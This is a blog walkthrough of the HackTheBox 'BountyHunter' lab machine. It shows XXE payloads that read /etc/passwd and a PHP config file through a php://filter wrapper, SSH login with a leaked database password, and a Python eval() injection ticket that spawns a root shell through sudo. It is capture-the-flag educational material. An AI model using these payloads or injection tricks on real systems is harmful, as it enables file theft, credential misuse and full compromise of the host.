BountyHunter HackTheBox WalkThrough

BountyHunter HackTheBox Walkthrough

This is BountyHunter HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted BountyHunter HackTheBox machine. Before starting let us know something about this box. It is a Linux OS box with IP address and difficulty level Easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and confirm your connectivity with BountyHunter machine by pinging its IP If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. As usual, I have used $nmap [a popular Port Scanner] for this task and the result is given below: –


$ sudo nmap -sC -sV -sT -p- -T4 -oN full-tcp.nmap
Nmap scan result during BountyHunter HackTheBox Walkthrough

Full port scan revealed port no 22 and 80 as open and others shown are filtered. OpenSSH 8.2p1 on port 22 and Apache2 web server on port 80 are running. OpenSSH is not vulnerable to any vulnerability therefore our full focus will be on web exploitation i.e., on port number 80. Since web server is running over port 80 so we should have some website running over this port which can be accessed through the URL Ongoing to this URL found a simple website written in php and bootstrap.

BountyHunter Front page

At URL found a Bounty Report System where anyone can submit the amount of bounty, he got along with its CWE id.

Bounty Report System

After capturing the request in burp after filling some dummy data found that all the entered values are firstly URL encoded then Base64 encoded.

On decoding found that all the entered values are travelling in XML format. Once I got that data is travelling in XML format then first vulnerability struck to my mind was XXE (XML External Entity Injection). Then immediately I tried to inject XXE payload and luckily got the very first payload to be executed. You can get a list of XXE payloads from here. For complete information about XXE and to solve various labs over it you can check PortSwigger article here.

URL and base64 decoded request captured during BountyHunter HackTheBox Walkthrough

Let us confirm XXE vulnerability using our payload.

Confirming XXE

Replace all the values of data parameter with the values given below or as shown in the screenshot below.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE bugreport [
<!ENTITY payload SYSTEM "file:///etc/passwd">]>
XXE request to retrieve passwd file from  BountyHunter

Once we have replaced the data values then we need to encode it using base64 and then URL encode.

Encoding the Payload 1

The encoded payload is

Exploiting XXE in BountyHunter HTB machine

We can clearly see the passwd file in the above burp response. Let us try to dump the content of db.php file. I got this file after performing directory bruteforcing at URL

Directory Bruteforcing result on BountyHunter HackTheBox Walkthrough

Since it is a php file therefore we can’t read it because it gets executed when we try to see its content. To retrieve its content, we have to use php wrapper php://filter/convert.base64-encode/resource. This wrapper will convert the content of php file into base64 and then dump it on the screen. For more info about php wrappers check this article. Let us change our payload to retrieve the content of file db.php.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE bugreport [
<!ENTITY payload SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php">]>
XXE request to retrieve content of db.php file

Then Base64 and URL encode it respectively.

Encoding the request 2 using Burpsuite decoder

The encoded payload will look like as given below.

Retrieving db.php file using php wrapper in BountyHunter HTB machine

The retrieved content of db.php file is


Let us base64 decode it and see what information we got from it.

$ echo -n "PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=" | base64 -d
Decoded content of db.php file

Some of the important information we got from above is given below.

$dbname = bounty

$dbusername = admin

$dbpassword = m19RoAU0hP41A1sTsq6K

This can’t be a publicly accessible database credential because no any port related to database is open and found during our nmap full port scan. Then I tried to use this credential to SSH into the box. I tried to use the credential development : m19RoAU0hP41A1sTsq6K and could easily logged in as user development. You can clearly see the below passwd file that user development has a login shell /bin/bash.

Passwd file retrieved by exploiting XXE

Let us SSH into the box using the credential development : m19RoAU0hP41A1sTsq6K.

Getting User Shell

$ ssh [email protected]
$ whoami && id
SSH into BountyHunter using the retrieved credential

Let us capture user flag.

Capture User Flag

$ cat user.txt
Capturing user flag during BountyHunter HackTheBox walkthrough

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like, and there are a lot more. This time I go for manual enumeration.

Finding PrivEsc Vector

$ sudo -l 

Above $sudo -l command revealed that user development can execute the file with root permission. This file is present in the directory /opt/skytrain_inc/.

Sudo-l command result

Let us see the content of this file to dig dipper into it.

$ vi /opt/skytrain_inc/
Content of file

This file contains a function eval() which is considered as a dangerous function in python if not properly used. eval() is used to parse any valid python expression or simply we can say it is used to execute any valid python code passed inside it. If an attacker provides any malicious python expression to execute through it then this can lead to Python Code Injection attack.

A proper validation of data should be implemented before passing them to this function dynamically if one needs to protect his application from this attack. For more info about this attack check this article.  

Since data passed inside eval() function in above script is unsanitized so we can take advantage of it and can pass any valid python expression which helps to execute OS command. We can use the expression __import__('os').system('/bin/bash') into our script by concatenating them using and operator with other input strings. This can be our potential privilege escalation vector.

When I tried to do the same, I could easily get root shell. So here our potential PrivEsc Vector is Privilege Escalation by Python Code Injection.

Getting Root Shell

To get root shell I created a file in the home directory of development user which contains the following code then simply called it while executing the file with root privilege.

# Skytrain Inc
## Ticket to
__Ticket Code:__
**102+ 20 == 122 and __import__('os').system('/bin/bash') == True
$ vi
$ cat
$ sudo /usr/bin/python3.8 /opt/skytrain_inc/
# whoami && id
Performing Privilege escalation and spawning root shell in BountyHunter HackTheBox machine

We have successfully got root shell. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt
Capturing root flag during BountyHunter HackTheBox walkthrough

This was how I rooted BountyHunter HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this article. For any query and suggestion about the walkthrough feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at